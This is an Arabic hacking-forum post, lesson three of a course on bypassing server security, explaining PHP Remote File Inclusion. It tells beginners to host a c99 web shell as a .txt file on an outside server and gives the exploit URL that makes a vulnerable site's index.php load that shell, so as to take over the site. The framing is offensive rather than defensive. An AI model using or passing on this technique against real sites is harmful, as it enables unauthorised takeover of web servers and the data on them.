الدرس الثالث (دينامكية عمل Remote File include ) - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG

التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"

مطلوب مشرفين على كامل اقسام المنتدى

أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

		منتدى أمن الإسلام \| لا اله الا الله محمد رسول الله \| IS-SEC.ORG \| Dz-SeC Team \| > ::. ســــاحة الــــهاكــــر الـعـام .:: > [ الدورات العامة ] > دورة تخطي الحماية للسيرفرات \| Crazy_Hacker
الدرس الثالث (دينامكية عمل Remote File include )

التسجيل

القرآن الكريم

التقويم

أدوات الموضوع

انواع عرض الموضوع

18/03/2010, 01:30 المشاركة رقم: 1

المعلومات
الكاتب:	ViRuS_Ra3cH
اللقب:
الصورة الرمزية

البيانات
التسجيل :	Mar 2010
العضوية :	2
الاهتمامات :	DZ
الإقامة :	DZ
المواضيع :	466
الردود :	629
المجموع :	1,095
بمعدل :	0.19 يوميا
الاختراقات :	[ra3ch]
مجتمعنا :	[]
الصنف :	Not Hacker
آخر تواجد :	02/01/2018/12:49
سبب الغياب :	معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم:	10
نقاط التقييم:	18

شكراً: 493

تم شكره 194 مرة في 101 مشاركة

الإتصالات
الحالة:
وسائل الإتصال:

الدرس الثالث (دينامكية عمل Remote File include )

السلام عليكم ورحمة الله وبركاته

وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))

كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر

الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي

هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا

كود PHP:


			
www.site.com/index.php?id=main.html

هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html

ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع

والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt

مثلا هذا الشل

كود PHP:


			
http://www.c99.mobi/c99.txt

نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id

وطريقة كتابة الإستغلال هي

كود PHP:


			
www.site.com/index.php?id=http://www.c99.mobi/c99.txt?

ع وضع علامة الـ ؟ في نهاية رابط الشل

واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء

فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى

الى هن ننهي الشرح

آخر مواضيع » ViRuS_Ra3cH

» Xenotix XSS Exploit
» DroidJack
» Increase Partition Size without Formatting
» phpBay Pro Plugin
» مع ام ضد

المزيد من مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===

مواقع النشر (المفضلة)

« الدرس الثاني (شرح أنواع الثغرات ومفاهيمها) | الدرس الرابع (دينامكية عمل ثغرة Remote command execution) »

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)

(أظهر الكل) الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 90

3bjo , 4V3NG3R , adelnobel , adminright , alex mex , AnAsSrC3 , Anis Gladiator , attacker , axa_20062000 , azizou , A£K93 , أحمد العرجان , badrou-25 , ben ali , ben laden _dz , binto , Black Nova , BlackHawk , BlackMask , Cyb3r_Disast3r , ال بطيور , الشبح المرح , الصاعق , dekmo , Devil-_-H@CKER , dossdivnet , Dr.AnTi_HaCkEr , Dr.xp , DZ-cOmbattant , elmojahid , eror , Ev!LScR!pT_Dz , eXe+18 , fartoto_dz2044 , fire-dz , Gomina7 , h4mz4 , hackxx , hero1983 , hiplorenzo , HmAnA07 , ib4dz , Ic3.BoY , illuminat , حكوكو , kata23 , lennix , loGin.Dz , m.mohammed , M3GO , manssik , mark94 , marwane , MdMn HaCk3r , moumouh206 , Mr.Cr3zy , mvp1994 , Nasser , netstat-41 , OXO , سجين الوطن , سيف العراقي , patch , Pheonix , poster7 , Power_Dz , rampage , redacamp8 , S1LV3rS3rf3r , SaMI-php , samidrif , Silver-39 , stallin , sultan-f16 , T!frani-hk , TaWaGNjD , Th3 K!LL3r Dz , the-joker , عامر شعري , عامرابوعمار , عبدالله الهاشمي , V.S , viomode , virangar , ViRuS Qalaa , VuRiS_Dz , Wanted Evil , wolf01 , wXer , zinouiori

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة لا تستطيع الرد على المواضيع لا تستطيع إرفاق ملفات لا تستطيع تعديل مشاركاتك رموز المنتدى متاحة الابتسامات متاحة كود [IMG] متاحة كود HTML معطلة قوانين المنتدى

الانتقال السريع

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
22/55 شرح استغلال ثغرات remote file include	yasMouh	دورة اختراق المواقع والسيرفورات \| HCJ	9	06/11/2014 16:04
Joomla Component (com_booklibrary) Remote File Include Vulnerablility	c41virus	[ منتدى الثغرات & أكتشافات الاعضاء ]	4	01/10/2010 15:27
الدرس السادس (استغلال ثغرة Local File Include)	ViRuS_Ra3cH	دورة تخطي الحماية للسيرفرات \| Crazy_Hacker	0	18/03/2010 01:56
الدرس الخامس (دينامكية عمل ثغرة Remote Upload Vulnerability)	ViRuS_Ra3cH	دورة تخطي الحماية للسيرفرات \| Crazy_Hacker	0	18/03/2010 01:48
الدرس الرابع (دينامكية عمل ثغرة Remote command execution)	ViRuS_Ra3cH	دورة تخطي الحماية للسيرفرات \| Crazy_Hacker	0	18/03/2010 01:33

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 09:12.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By yasMouh
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team

RSS RSS 2.0 XML MAP HTML